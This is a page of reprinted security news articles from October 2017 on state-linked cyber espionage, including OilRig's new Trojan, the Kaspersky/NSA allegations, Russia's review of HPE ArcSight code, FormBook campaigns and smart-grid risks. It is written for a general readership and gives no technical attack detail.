- BigBrothers -

Last update 09.10.2017 13:51:26

Introduction  List  Kategorie  Subcategory  0  1  2  3  4  5  6  7  8 



Iranian Cyberspies Use New Trojan in Middle East Attacks
10.10.2017 securityweek BigBrothers
A cyberespionage group previously linked to Iran has been using a new Trojan in attacks aimed at entities in the Middle East, Palo Alto Networks reported on Monday.

The threat actor, known as OilRig, was recently spotted launching attacks against an organization within the government of the United Arab Emirates (UAE).

When it first discovered the group’s activities back in May 2016, Palo Alto Networks believed the attacks had been carried out by a known group, but researchers later determined that the campaign was actually the work of a new actor, which is now tracked as OilRig.

OilRig has been known to use a remote access trojan (RAT) named ISMDoor, which researchers also identified in attacks launched by another Iran-linked cyberspy group known as Greenbug.OilRig hackers use new Trojan

In attacks seen by Palo Alto Networks in July 2017, OilRig had started using a new piece of malware dubbed “ISMAgent,” which appeared to be a variant of the ISMDoor RAT. In even more recent attacks, observed by experts in August 2017, a new injector Trojan was used by the attackers.

The new malware, tracked as “ISMInjector,” is a tool that has a sophisticated architecture and it includes anti-analysis techniques that were not previously leveraged by this group.

“The complex structure and inclusion of new anti-analysis techniques may suggest that this group is increasing their development efforts in order to evade detection and gain higher efficacy in their attacks,” Palo Alto Networks researchers said in a blog post.

In the attack aimed at the UAE government, hackers delivered their malware using malicious documents attached to emails with the subject line “Important Issue.” What made the emails interesting was the fact that they came from the targeted organization’s own domain. While experts initially believed that the attackers had spoofed the sender, they later determined that they actually used a compromised Outlook Web Access (OWA) account whose credentials they obtained in a previous phishing attack.

The malicious documents sent to the UAE government, tracked by Palo Alto as “ThreeDollars,” delivered the new ISMInjector Trojan, which in turn dropped a variant of the ISMAgent backdoor by injecting it into a remote process it created.

In order to make analysis of ISMInjector more difficult, the malware’s developers have relied on what researchers call “state machines” to create a new process and inject the payload into that process. Each state is responsible for conducting a particular action and it specifies the next state that should be executed.

Since the states are not executed in sequential order, researchers analyzing the malware have to jump around in the code to determine how it works, which makes it more challenging to investigate the threat. Analysis of the malware is further complicated by the use of a crypter.

Iran appears to have several cyber espionage groups, including APT33, Rocket Kitten, Cobalt Gypsy (Magic Hound), Charming Kitten (aka Newscaster and NewsBeef) and CopyKittens.


North Korea hackers threaten Irish companies with ‘almost daily’ attacks
9.10.2017 securityaffairs BigBrothers

State-sponsored hackers from North Korea are launching almost daily attacks on Irish companies and critical infrastructure
North Korean state-sponsored hackers are launching almost daily attacks on Irish companies and critical infrastructure, they are also suspected to be responsible for the €4.3m cyber heist on Meath County Council in October 2016.

Ireland is considered a privileged target of nation-state actors due to the presence of many US multinationals.

Defence Minister Paul Kehoe recognized the urgency to rapidly improve the security of national infrastructure against cyber attacks.

The overall cost of cyber attacks on Irish companies has soared from €498,000 in 2014 to €1.7m in 2016, and the situation will be worst in a next future.

“The number of cyber attacks suffered by Irish businesses doubled between 2012 and 2016, but that figure is expected to double or even treble because of recent ransomware attacks.” reported the Irish Independent.

North Korea has recently turned to international cyber robbery to fund its military operations, and Ireland is on the front line of the cyber battle.

“But North Korea has thrown the entire rule book out the window. It is basically engaging in cyber warfare to raise funds and to cause global chaos.” explained the expert Ronan Murphy form Smarttech247.

“There is no safe hiding place anymore. These aren’t ordinary criminal gangs – you are essentially dealing with state cyber intelligence units.”

Murphy attributed the massive WannaCry ransomware attack to the North Korean attack that was financially motivated by that only netted a measly €120,000 for Pyongyang.

North Korea hackers

Murphy highlighted the importance to improve security defenses against even more sophisticated cyber attacks.

“These probing attacks are occurring almost 24/7 on Irish networks and, in most cases, the firms involved are simply not aware of it.” added Murphy.

“Smarttech logged an incredible 21 million attacks last year – and the rate of attacks is increasing on a daily basis.” continues the Independent.

According to a recent nationwide cyber security awareness survey, over 171,000 Irish businesses could be vulnerable to ransomware-based attacks.


Cyber Attacks Targeted Interests of Billionaire Chinese Dissident
9.10.2017 securityweek BigBrothers
Two Recent Alleged Cyber Attacks Have More to do with Politics Than Cybercrime

Two little-reported but alleged cyber attacks in recent weeks -- one against the Hudson Institute (a politically conserative think tank), and one against legal firm Clark Hill -- seem to revolve around China's campaign against dissident Guo Wengui (aka Miles Kwok) currently resident in New York and seeking political asylum. In both cases the finger has been pointed at China, and in both cases China has denied any involvement.

The first led to the sudden cancellation of a Hudson Institute event scheduled for October 4: A conversation with Guo Wengui. Hudson Institute said it had detected a cyber attack emanating from Shanghai a few days earlier. Hudson spokesman David Tell played down the effect of the DDoS attack, and blamed the event cancellation on poor planning: "The planning just got away from us and we feel bad," he told the Washington Free Beacon.

The second cyber attack apparently led to law firm Clark Hill withdrawing representation from Wengui, after earlier lodging Wengui's asylum claim. Clark Hill has merely confirmed that it no longer represents Wengui; but Wengui has claimed that it follows the law firm being targeted by Chinese hackers.

Wengui is a Chinese property billionaire wanted in China on corruption charges. In turn, he claims that the Chinese government is a kleptocracy. At a press conference Thursday, he produced what he claimed were 'top secret' Chinese government documents showing that China had sent secret agents into the United States. China claims they are forgeries.

In April, China issued an Interpol red notice on Wengui. These are not arrest warrants. Unlike the European Arrest Warrant (EAW) that has validity throughout the European Union (the UK was obligated to arrest Julian Assange in 2010 because of a Swedish EAW), no Interpol country is required to arrest the subject of a red notice -- it is merely a way of telling all Interpol countries that the subject is wanted in the issuing country.

Wengui's wealth has been estimated at $38 billion, earned through property and other investments. Much of his assets in China have been blocked by the government, where he is reportedly being investigated for at least 19 crimes, ranging from kidnapping, fraud, and rape to money laundering.

The whole debacle comes at an interesting point in US/Sino relations. The U.S. is seeking increased Chinese assistance against North Korea -- and there are some signs of mutual cooperation. U.S. Secretary of State Rex Tillerson was in Beijing between September 28 and October 1, meeting with senior Chinese officials.

At this point, US Cyber Command was still delivering its DDoS attack against North Korea's military spy agency, the Reconnaissance General Bureau (RGB). At the time, the only way into North Korea was through the connection owned by China's China Unicom (Russia has since opened a second connection across the Friendship Bridge between the two countries). Technically, it would be possible for Cyber Command to use this channel without China's knowledge or cooperation. However, the possibility of footprints being left that could trace the attack back to Cyber Command make it unlikely that it was done without China's knowledge.

Similarly, on the scheduled day of the Hudson Institute event with Wengui, a Chinese delegation was in Washington for a high-level law enforcement and cyber security dialogue between the U.S. and China. The alleged attack was raised by U.S. Attorney General Jeff Sessions during a meeting with China’s Public Security Minister Guo Shengkun, and China pledged to cooperate with an investigation.

The meeting was part of a high level communication channel established between Beijing and Washington following the meeting between President Trump and President Xi Jinping in April. While Trump is keen to get China's cooperation over North Korea, Xi Jinping is keen that nothing rocks the boat too seriously ahead of the 19th Party Congress later this month. Xi Jinping, while being a strict authoritarian, has been engaged in a long-running anti-corruption campaign in China -- although this is thought to be more about strengthening the party's control over the military than about improving civil rights.

On Saturday, the Chinese Ministry of Public Security issued a statement denying any involvement in cyberattacks against the Hudson Institute or Clark Hill. “The Chinese government would like to suggest that the US law enforcement authorities supply China with the detailed information, relevant clues and evidence, so that China could assist in the investigations to identify the real source of such hacking,” the ministry said, adding it would cooperate fully in any investigation.


Extradition of Russian to U.S. on Bitcoin Charges 'Unjust': Moscow
9.10.2017 securityweek BigBrothers
Moscow on Friday slammed a Greek court's ruling that a Russian national accused of helping criminals launder billions of dollars using Bitcoin should be extradited to the United States.

Alexander Vinnik, who headed BTC-e, an exchange he operated for the cyber currency, was indicted by a US court in July on 21 charges ranging from identity theft and facilitating drug trafficking to money laundering.

Vinnik said he would appeal the extradition decision of the Thessaloniki court on Wednesday.

"We consider that the verdict is unjust and violates the norms of international law," the Russian foreign ministry said in a statement.

"Greek authorities received a request from the Russian attorney general that Vinnik be extradited to Russia" which "should have priority, as Vinnik is a Russian citizen," the ministry said.

"Such a ruling is all the more surprising considering the context of friendly relations between Russia and Greece...we hope the relevant Greek authorities will take into account the request of the Russian attorney general (at appeal)."

The final decision on whether to extradite Vinnik will be made by the Greek justice minister.

The Russian has been languishing in a Greek jail since his arrest on July 25 in the tourist resort of Halkidiki, near Thessaloniki.

According to US authorities, Vinnik "stole identities, facilitated drug trafficking, and helped to launder criminal proceeds from syndicates around the world".

BTC-e, founded in 2011, became one of the world's largest and most widely used digital currency exchanges, but according to the US indictment, it was "heavily reliant on criminals".


Extradition of Russian to U.S. on Bitcoin Charges 'Unjust': Moscow
9.10.2017 securityweek BigBrothers

Moscow on Friday slammed a Greek court's ruling that a Russian national accused of helping criminals launder billions of dollars using Bitcoin should be extradited to the United States.

Alexander Vinnik, who headed BTC-e, an exchange he operated for the cyber currency, was indicted by a US court in July on 21 charges ranging from identity theft and facilitating drug trafficking to money laundering.

Vinnik said he would appeal the extradition decision of the Thessaloniki court on Wednesday.

"We consider that the verdict is unjust and violates the norms of international law," the Russian foreign ministry said in a statement.

"Greek authorities received a request from the Russian attorney general that Vinnik be extradited to Russia" which "should have priority, as Vinnik is a Russian citizen," the ministry said.

"Such a ruling is all the more surprising considering the context of friendly relations between Russia and Greece...we hope the relevant Greek authorities will take into account the request of the Russian attorney general (at appeal)."

The final decision on whether to extradite Vinnik will be made by the Greek justice minister.

The Russian has been languishing in a Greek jail since his arrest on July 25 in the tourist resort of Halkidiki, near Thessaloniki.

According to US authorities, Vinnik "stole identities, facilitated drug trafficking, and helped to launder criminal proceeds from syndicates around the world".

BTC-e, founded in 2011, became one of the world's largest and most widely used digital currency exchanges, but according to the US indictment, it was "heavily reliant on criminals".


HPE allowed Russians review the code of ArcSight software also used by the Pentagon
9.10.2017 securityaffairs BigBrothers

HPE gave Russian gov access to review ArcSight software that is currently used by corporate and government entities worldwide, including the Pentagon.
The recent news of the alleged hack of Kaspersky products to steal NSA exploit from the personal PC of a US contractor has put in the background another equally worrying news.

Another tech giant has come under fire, reports claimed the company HPE gave Russian defence forces access to review software it sold to the Pentagon. The software is the same supposedly used to protect the agency’s networks.

According to regulatory records seen by the Reuters agency, HPE allowed Russian defence agencies to access the source code of its ArcSight software with the intent to obtain the certification needed to sell its software to the Russian public sector.

The review for the ArcSight software took place last year, while the tension between Washington and Moscow was high due to the increasing number of cyber attacks against U.S. politicians, government agencies, and companies.

“Hewlett Packard Enterprise allowed a Russian defense agency to review the inner workings of cyber defense software used by the Pentagon to guard its computer networks, according to Russian regulatory records and interviews with people with direct knowledge of the issue.” states a blog post published by the Reuters.

“The HPE system, called ArcSight, serves as a cybersecurity nerve center for much of the U.S. military, alerting analysts when it detects that computer systems may have come under attack. ArcSight is also widely used in the private sector.”

The ArcSight platform is used in both government and private industries, clearly, the analysis of the code could help the Russian Government in detecting security vulnerabilities that could be exploited by state-sponsored hackers to target HPE customers, including the Pentagon.

The Reuters quoted several former US military sources and former ArcSight employees, HPE told Reuters that no “backdoor vulnerabilities” were uncovered in the Russian review.

Of course, this is not sufficient, do you believe that Russian experts would have reported HPE the flaws discovered during the review.

“Six former U.S. intelligence officials, as well as former ArcSight employees and independent security experts, said the source code review could help Moscow discover weaknesses in the software, potentially helping attackers to blind the U.S. military to a cyber attack.” continues the Reuters.

“It’s a huge security vulnerability,“ said Greg Martin, a former security architect for ArcSight. ”You are definitely giving inner access and potential exploits to an adversary.”

HPE pointed out that neither ArcSight source code or any of its products had been compromised.

The review was carried out by the company Echelon which has close ties to the Russian military. The company operated on behalf of Russia’s Federal Service for Technical and Export Control (FSTEC), the Russian agency tasked with countering cyber espionage.

“Echelon president and majority owner Alexey Markov said in an email to Reuters that he is required to report any vulnerabilities his team discovers to the Russian government.” continues the Reuters.

“But he said he does so only after alerting the software developer of the problem and getting its permission to disclose the vulnerability. Echelon did not provide details about HPE’s source code review, citing a non-disclosure agreement with the company.”

HPE

From the Russian point of view, it is essential to review the code of any software developed by foreign firms in order to prevent cyber espionage activities like the ones described by Edward Snowden.

The Russia Government requested to analysis the code to allow sales to government agencies avoiding foreign intelligence placing spy implants in the software and hardware components.


British Teen Admits Trying to Hack CIA Chief
7.10.2017 securityweek BigBrothers
A teenager admitted in a British court on Friday to trying to hack into the computers of top US officials, including former CIA chief John Brennan, from his home in the East Midlands region of England.

Kane Gamble, 18, pleaded guilty to ten charges related to the attempted intrusions in late 2015 and early 2016, which targeted the US Department of Justice and an array of senior American security officials.

These included James Clapper, the Director of National Intelligence under President Obama; Jeh Johnson, the former US Secretary of Homeland Security; and a deputy director of the FBI.

Gamble, from Coalville, Leicester -- a small town 110 miles (177 kilometres) northwest of London -- pleaded guilty to eight charges of performing a function with intent to secure unauthorised access, and two charges of unauthorised acts with intent to impair operation of a computer.

He was released on conditional bail ahead of sentencing on December 15.

British judges have sentenced defendants in other hacking cases in recent years to up to two years in prison.

Media reports at the time of the attempted breaches said they were part of a wider "hacktivist" group known as "Crackas With Attitude", which targeted the US officials and their families between October 2015 and February 2016.

The US Justice Department arrested two men in September 2016 in North Carolina on suspicion of belonging to the network.


British teenager admits trying to hack CIA Chief and other top US officials
7.10.2017 secúrityaffairs BigBrothers

A British teenager admitted in a British court to have attempted to hack into the computers of top US officials, including former CIA chief John Brennan.
On Friday, the British teenager Kane Gamble (18) from Coalville, Leicester, admitted in a British court to have attempted to hack into the computers of top US officials, including former CIA chief John Brennan.

former CIA chief John Brennan.

Kane Gamble pleaded guilty to ten charges related to the attempted intrusions occurred between late 2015 and early 2016.

Gamble pleaded guilty to eight charges of performing a function with intent to gain unauthorized access, and two charges of unauthorized acts with intent to compromise the operation of a computer.

The teenager targeted the US Department of Justice and many other senior American security officials from his home in the East Midlands region of England.

The list of targeted officials is long and includes James Clapper, the Director of National Intelligence under President Obama’s administration and the deputy director of the FBI Jeh Johnson.

The teenager was released on conditional bail ahead of sentencing on December 15.

The man was suspected to be the member the dreaded hacking crews ‘Crackas With Attitude‘ that targeted the US officials between October 2015 and February 2016.

In September 2016, U.S. authorities arrested two alleged members of the Crackas With Attitude group involved in dumping details of officials with the FBI and the DHS.

In September 2017, one of the two men arrested has been sentenced to five years in federal prison.


U.S. Believes Russian Spies Used Kaspersky Antivirus to Steal NSA Secrets
7.10.2017 thehackernews BigBrothers

Do you know—United States Government has banned federal agencies from using Kaspersky antivirus software over spying fear?
Though there's no solid evidence yet available, an article published by WSJ claims that the Russian state-sponsored hackers stole highly classified NSA documents from a contractor in 2015 with the help of a security program made by Russia-based security firm Kaspersky Lab.
Currently, there is no way to independently confirm if the claims on the popular security vendor published by the Wall Street Journal is accurate—and the story does not even prove the involvement of Kaspersky.
"As a private company, Kaspersky Lab does not have inappropriate ties to any government, including Russia, and the only conclusion seems to be that Kaspersky Lab is caught in the middle of a geopolitical fight," Kaspersky said in a statement.
The NSA contractor working with the American intelligence agency, whose identity has not yet been disclosed, reportedly downloaded a cache of highly classified information from government systems and moved it to a personal computer at home, which is clear violation of known security procedures.
Citing some anonymous sources, the Journal says that the targeted computer was running Kaspersky antivirus—the same app the U.S. Department of Homeland Security (DHS) recently banned from all government computer systems over spying fear.
The classified documents taken to home by the contractor contained details about how the NSA breaks into foreign computer networks for cyber espionage operations as well as defends its systems against cyber attacks.
Although what role Kaspersky played in the breach is not entirely clear, US officials believe antivirus scan performed by Kaspersky Lab’s security software on the contractor's computer helped Russian hackers in identifying the files containing sensitive information.
In response to the WSJ story, Kaspersky CEO Eugene Kaspersky said his company "has not been provided with any evidence substantiating the company's involvement in the alleged incident. The only conclusion sees to be that Kaspersky Lab is caught in the middle of a geopolitical fight."
Also, it is not clear exactly how the files were stolen, but it has been speculated that the antivirus’ practice of uploading suspicious files (malware executables) on the company's server, located in Russia, may have granted the Russian government access to the data.
Another possibility is that Russian hackers stole the confidential data by exploiting vulnerabilities in Kaspersky Lab software installed on the targeted system, according to the person, who asked not to be identified.
"Now, if we assume that what is reported is true: that Russian hackers exploited a weakness in our products installed on the PC of one of our users, and the government agencies charged with protecting national security knew about that, why didn’t they report it to us?" Kaspersky said.
"We patch the most severe bugs in a matter of hours; so why not make the world a bit more secure by reporting the vulnerability to us? I cannot imagine an ethical justification for not doing so."
This breach of NSA classified files, which is being called "one of the most significant security breaches in recent years," was occurred in 2015, but detected in 2016.
However, it is not clear whether this security incident has any ties to the Shadow Brokers campaign, an ongoing public leak of NSA hacking tools that many officials and experts have linked to the Russian government.
It is another embarrassing breach for the NSA, which has long struggled with contractor security—starting from Edward Snowden to Harold Thomas Martin and Reality Winner.


British Teen Admits Trying to Hack CIA Chief
7.10.2017 securityweek BigBrothers
A teenager admitted in a British court on Friday to trying to hack into the computers of top US officials, including former CIA chief John Brennan, from his home in the East Midlands region of England.

Kane Gamble, 18, pleaded guilty to ten charges related to the attempted intrusions in late 2015 and early 2016, which targeted the US Department of Justice and an array of senior American security officials.

These included James Clapper, the Director of National Intelligence under President Obama; Jeh Johnson, the former US Secretary of Homeland Security; and a deputy director of the FBI.

Gamble, from Coalville, Leicester -- a small town 110 miles (177 kilometres) northwest of London -- pleaded guilty to eight charges of performing a function with intent to secure unauthorised access, and two charges of unauthorised acts with intent to impair operation of a computer.

He was released on conditional bail ahead of sentencing on December 15.

British judges have sentenced defendants in other hacking cases in recent years to up to two years in prison.

Media reports at the time of the attempted breaches said they were part of a wider "hacktivist" group known as "Crackas With Attitude", which targeted the US officials and their families between October 2015 and February 2016.

The US Justice Department arrested two men in September 2016 in North Carolina on suspicion of belonging to the network.


Russian Hackers Exploited Kaspersky Software to Steal NSA Exploits: Report
6.10.2017 securityweek BigBrothers
Still No Smoking Gun as Russian Hackers Reportedly Exploited Kaspersky Software to Steal NSA Exploits From NSA Contractor's Home Computer

A new report in the Wall Street Journal (WSJ) purports to provide the first evidence that directly ties Russian security firm Kaspersky Lab to the Russian government.

The report states, "Hackers working for the Russian government stole details of how the U.S. penetrates foreign computer networks and defends against cyberattacks after a National Security Agency contractor removed the highly classified material and put it on his home computer, according to multiple people with knowledge of the matter.

"The hackers appear to have targeted the contractor after identifying the files through the contractor's use of a popular antivirus software made by Russia-based Kaspersky Lab, these people said."

The problem with the report is that it offers no evidence and comes from anonymous, unnamed sources: allowing Eugene Kaspersky to immediately respond, "The first statement sounds like the script of a C movie, and again -- disclosed by anonymous sources (what a surprise)."

Without specific evidence, the WSJ describes several known facts and assumes a relationship. It is told that an unnamed NSA contractor removed sensitive data from the NSA and stored it on his home computer. That contractor had Kaspersky Lab software installed at home. The Kaspersky Lab software scanned all the new files (it's what antivirus does) collecting unknown files for deeper analysis. Russian government hackers then targeted the contractor and stole the NSA documents.

There is a gap in this chain of events -- between Kaspersky automatically scanning the files and the Russian government hacking the contractor. The reported implication, strenuously denied by Kaspersky Lab, is that the company informed the Russian government of the presence of NSA files on this contractor's computer.

The reality is, based on all public data so far, any direct link between Kaspersky Lab and the Russian government remains speculation only. Now it could be that the US intelligence community has additional evidence that it is not disclosing; but this report from the WSJ is no evidence-based smoking gun.

There is an alternative scenario (which like direct Kaspersky involvement, is purely conjecture). It is highly likely that Russian intelligence would be aware of individual NSA contractors. Given that two contractors are already known to have leaked NSA documents (Edward Snowden and Harold Martin), it would be tempting to target the home computers of known contractors. It is possible that Russian hackers were already present on the contractor's computer when he brought home the NSA files. In this scenario, Kaspersky's involvement is limited to the coincidence of being the antivirus of choice by the contractor.

A second alternative is that Kaspersky Lab software has been unknowingly compromised by the Russian government. This gains some credence from the recent compromise of Avast's CCleaner, allegedly by the Chinese government (Avast is another antivirus company). The CCleaner incident, however, was rapidly detected and quickly solved.

Kaspersky has admitted that its own corporate network has been compromised in the past. In the Spring of 2016, Kaspersky Lab detected an intrusion of its internal systems while testing a prototype of technology designed to detect advanced persistent threats.

At the time, Eugene Kaspersky explained that one reason it was hacked could be that the spies were interested in the inner workings of the company. "We obviously have our share of technological secrets as we’re a competitive business, but I can’t think of anything really top secret," Kaspersky said. "Maybe the idea was to steal our technologies, source code, know-how and ideas to support the attackers’ own software development," he added.

The WSJ report provides only ambiguous indications of how the Russian hackers got the data off the contractor's computer. It includes the statement, "The breach is the first known incident in which Kaspersky software is believed to have been exploited by Russian hackers to conduct espionage against the U.S. government."

This could be interpreted as the supposed collusion between Kaspersky and the Russian government; or that the hackers exploited a vulnerability in the software itself. Assuming the latter, Kaspersky responded, "Now if we assume, that what is reported is true: that Russian hackers exploited a weakness in our products installed on a PC of one of our users, and respected government agencies concerned of national security knew about that, why didn't they report it to us?... I can't imagine an ethical justification for not doing so."

Kaspersky has addressed several remotely exploitable vulnerabilities in its products over the years, along with just about every other AV vendor, making a possible scenario that Kaspersky's software was exploited by the Russian hackers, without any knowledge or cooperation of Kaspersky Lab.

The WSJ report does, however, provoke further considerations. The first is how can the U.S. government allow insiders to walk out (literally or figuratively) with such highly sensitive data: Bradey Manning, Edward Snowden, Martin, and now +1. If the NSA cannot control the insider threat, what hope is there for any commercial organization?

The second question is whether this breach is the source of the Shadow Brokers trove of NSA exploits. There has been conjecture in the past that Martin was the source -- but the WSJ report specifically comments, Martin "allegedly removed massive amounts of classified information from the agency's headquarters and kept it at his home, but wasn't thought to have shared the data." The implication is that Martin is not the source of the Shadow Brokers' data.

Is this new breach the source? The timing fits. The incident apparently occurred in 2015, but the NSA only became aware in spring of 2016. That's exactly the time that Shadow Brokers made their first announcements and started leaking NSA exploits that fit the WSJ's description of "details about how the NSA penetrates foreign computer networks, the computer code it uses for such spying and how it defends networks inside the U.S."

As soon as the NSA was aware of the loss of its exploits, their value to the Russian government would diminish -- and the most damaging action would be to make them public.

The reality is that all of this is conjecture. The DHS has banned the use of Kaspersky software by any government agency, stating, "The risk that the Russian government, whether acting on its own or in collaboration with Kaspersky, could capitalize on access provided by Kaspersky products to compromise federal information and information systems directly implicates U.S. national security." It talks about risk, not about proof.

Concern over the risk is understandable and proper, and keeping Kaspersky software out of government would be reasonable. However, the U.S. government has chosen to take a very public stance -- without proof -- against the Russian company.

This adds fuel to Kaspersky's own suspicions. In a statement emailed to SecurityWeek, it said, "As a private company, Kaspersky Lab does not have inappropriate ties to any government, including Russia, and the only conclusion seems to be that Kaspersky Lab is caught in the middle of a geopolitical fight."

Evidence of that geopolitical fight is all around us, from U.S. Cyber Command attacking the North Korean Spy agency and Putin's response to double Pyongyang's internet access; to Russia's interference in the 2016 American presidential election and its use of the Ukraine and Baltic areas to test cyber capabilities.

*Additional reporting by Mike Lennon


Zapad drills – Russia may have tested cyber weapons on Latvia
6.10.2017 securityaffairs BigBrothers

According to intelligence experts the recent Zapad drills conducted by Russia simulated an attack on all Baltic countries, it included the use of cyber weapons.
Baltic and NATO officials claim Russia was behind outage in Latvia’s mobile communications network before Russia’s war games in September code-named Zapad. According to the expert, Russia may have tested one of the weapons in its cyber arsenal.

The cyber attacks caused the interruption of the mobile network along Latvia’s western coast for seven hours on Aug. 30. The Russian army may have used communications jammer aimed towards Sweden from the Russia’s Baltic outpost Kaliningrad.

A Swedish defense ministry spokesperson said the ministry was not aware of any jamming attempt directed at Sweden infrastructure.

“Russia appears to have switched on a mobile communications jammer in Kaliningrad, a very powerful one that wasn’t aimed at Latvia, but towards Gotland, the Aland Islands,” explained Karlis Serzants, the deputy chairman of the Latvian parliament’s National Security Committee.

“One of the edges (of the beam) affected Latvia too,” he told Reuters after being briefed by Latvian intelligence.

Zapad drills Russia

Latvian officials believe the Russian hackers also targeted Latvia’s emergency services’ 112 hotline, which started having problems since Sept. 13.

“Russia simulated an attack on all Baltic countries,” said Lithuania’s Defence Minister Raimundas Karoblis.

Reuters contacted the Russian Defence Ministry but did not receive any comment on the allegations.

The experts also observed other incidents linked to the Zapad drills, the first one revolves around hacking soldiers’ smartphones. It seems that Russian soldiers used both drones with hacking tools a mobile telephone tower similar to the stingray equipment. The sophistication of the attacks leaves little doubt that there is some state-sponsorship involved.

According to the WSJ, one victim, U.S. Army Lt. Col. Christopher L’Heureux, “said at least six soldiers he commands have had phones or Facebook accounts hacked. He said he suspects the incidents were meant as a message that Russian intelligence forces were tracking him, could crack his passwords and wanted to intimidate his soldiers.”

WSJ reports, “Military cyberespionage experts said the drone flights and cellphone data collection suggest Russia is trying to monitor troop levels at NATO’s new bases to see if there are more forces present there than the alliance has publicly disclosed.”

NATO intelligence experts believe that the tests of cyber capabilities were the core the Zapad drills.
Unfortunately, not all European allies in NATO are ready to repel such kind of attacks, and NATO cyber strategy is purely defensive.

NATO diplomat highlighted the ability of Russian units to intercept or jam civilian networks “within a significant radius and with relative ease”, posing serious risks for NATO communications and radars.

There is no doubt, the Zapad drills just confirmed that Russia had developed “a significant electronic warfare capability” over the past three years.

“A lot of this was on display during the (Zapad) exercises,” U.S. Army Lieutenant General Ben Hodges, who heads U.S. Army forces in Europe, told reporters.


Securing smart grid and advanced metering infrastructure
6.10.2017 securityaffairs BigBrothers

The year is 2020, high economic, military and cultural tension between Russia & the US.

You are at the London office, entering a video meeting with the sales team in America, the American team presents with enthusiasm the sales achievement of the recent quarter, then, suddenly the call is disconnected. You are trying to re-establish the connection with no success.

You are receiving a WhatsApp message to your mobile: “we have an electricity outage in the office, we are leaving the conference room. We will reschedule”.

One hour later, reports are starting to pop up in the media announcing about an outage in dozens of countries in the US.

A few hours later, many Tweets from the news channel indicate that the US president is about to give a special announcement about the power outage in the US.

You turn on the television and the president begins to speech: “Today we are experiencing a national tragedy. Dozens of areas in the US have been cut off from power, in what appears to be a cyber-attack on our country.”

“I have spoken with the director of the FBI who confirmed that millions of meters have transformed into bricks”

“I have ordered a full resource of the federal government, go to help the victimizes and their family and to conduct full-scale investigation to hunt down and to find the people who committed this act”

Science fiction? Let us review some of the examples from the recent years.

Black hat as an incubator

The Black Hat conference is a meeting place for cyber-security activists around the world. On several occasions, it presented vulnerabilities and exploits on smart/electricity metering devices and network.

It began in 2008 when Cleveland presented how to send a disconnect message to millions of smart meters on the power grid.

A year later, P. McDaniel and S. McLaughlin demonstrated how to change the energy usage of the smart meter.

In 2014, researchers from universities in the United States and China introduced the “puppet attack” that increased the network traffic of smart meter by up to 20%, which could potentially lead to a denial of service attack.

From the cyber security conferences to a reality

During the recent years, there have been two cyber-attacks on power plants in the largest country in Europe – Ukraine, which for the first time in the history succeeded to disrupted and cut power in a country.

The cyber-attacks, which were a part of the Russia-Ukraine war, began in December 2015, when 230,000 people were left without electricity for one to six hours as attackers hit three electricity providers in Ukraine and demonstrated a variety of techniques, including spear phishing emails, variants of the “BlackEnergy” malware, and the manipulation of Microsoft Office documents that contained the malware to gain a foothold in the networks.

A year after, another cyber-attack hit the capital Kiev when citizens were disconnected from power for an hour due to a malware framework called “Industroyer” or “crashoverride”, specifically designed to attack electric grids, succeeded to shut down the Ukraine’s power plant.

Lesson Learned?

In addition to the two cases attributed to Russia, there was another case in June 2017 when the Chernobyl nuclear power plant was extinguished by damage caused by the Petya / No Petya malware, which affected rail stations, banks, and parliamentary activities.

Three conditions to materialize a cyber attack

An analysis of the events in Ukraine indicates that in order for a cyber-attack to materialize, three conditions must exist: opportunity, ability, and motivation.

Opportunity: every day hundreds and dozens of new security vulnerabilities are being discovered across different platforms – some of them are published and some of them not.

These vulnerabilities are a window of opportunity for potential attackers in transition to exploit.

Ability: in an age of HaaS (hacking as a service), hacktivism, organized crime and hackers groups that publish Nation’s cyber tools, the ability to execute a major cyber-attack has become easier, faster and smarter than ever.

Motivation: what causes the attacker to attack? various reasons. In continuous to the first chapter – it was an anonymous act that conducted to totally disrupt the US citizen normal life.

Hardware level attack example

This part of the article will focus on the advanced metering attack surface. The smart metering infrastructure consists of three main components:

Smart meter
Meters Hub,
Data management System.
These components are part of a heterogeneous, multi-vendor system and interfaces that communicate using standards for such as: IEC 62056.

Smart meters are usually installed in public places such as residential & business areas and their function is to identify and calculate the power consumption. The meters are connected to the data management system through hubs and enable the service provider to manage the meter remotely and provide additional innovative services to customers.

Schematically smart meter has 5 main components: 1. Main control unit 2. Identification and calculation unit 3. PLC communication unit 4. Radio communication unit 5. Optical management interface. Each of the components has an attack surface.

The next part of the article will focus on the attack surface of the control unit.

The main control unit orchestrates the main functions of the metering and includes microcontrollers, memory chips and firmware. The primary control unit is exposed to hardware and firmware attacks by an attacker who has physical access to the primary control unit and can install compatible malicious hardware to help steal the encryption keys or use an unprotected JTAG interface to extract data from the central control unit such as passwords.

An attacker can use an unprotected JTAG to run a malicious firmware that would allow an attacker to control information transmitted from the data management system and to support external interfaces such as a cellular modem to allow remote connection.

Firmware and hardware manipulation can also steal and change the electricity usage which has major implications, including customer privacy and provider’s cache flow (theft of electricity).

We should embrace cyber security initiatives as we embrace innovation and new technologies, the evolution of techniques and technologies used by attackers is a wakeup call to the regulator, leading power companies, and vendors to add cyber defense as safety, reliability and productivity in order to minimize the ability and opportunity of the cyber attack as an act of war.


FormBook Campaigns Target U.S., South Korea
6.10.2017 securityweek BigBrothers
Various industries in the United States and South Korea were targeted during the third quarter of the year in several high-volume FormBook distribution campaigns, FireEye reports.

As part of these campaigns, the attackers used various delivery mechanisms, including PDF documents containing download links, DOC and XLS files with malicious macros, and archive files containing executables.

The security researchers noticed that the PDF and DOC/XLS documents were mainly used to target organizations in the U.S., while the archives were used both in the U.S. and South Korea attacks. Impacted sectors included aerospace, defense contractors, and manufacturing.

The attacks were aimed at infecting victims’ computers with the FormBook information stealer, a piece of malware being sold through various hacking forums since early 2016 and which recently registered an increase in activity.

FormBook was designed to steal a variety of information from the infected machine, including keystrokes, clipboard contents, HTTP/HTTPS/SPDY/HTTP2 forms and network requests, passwords from browsers and email clients, and screenshots, and send it to the command and control (C&C) server.

To perform its malicious routines, the malware injects itself into various processes and also installs the necessary function hooks to log keystrokes, steal clipboard contents, and extract data from HTTP sessions. Furthermore, the malware can execute commands received from the C&C to download and execute files, start processes, shutdown and reboot the system, and steal cookies and local passwords.

The threat typically uses C&C domains from newer generic top-level domains (gTLDs) such as .site, .website, .tech, .online, and .info. The domains associated with the malware’s recent activity have been registered using the WhoisGuard privacy protection service, while the server infrastructure is hosted by a Ukrainian company, FireEye discovered.

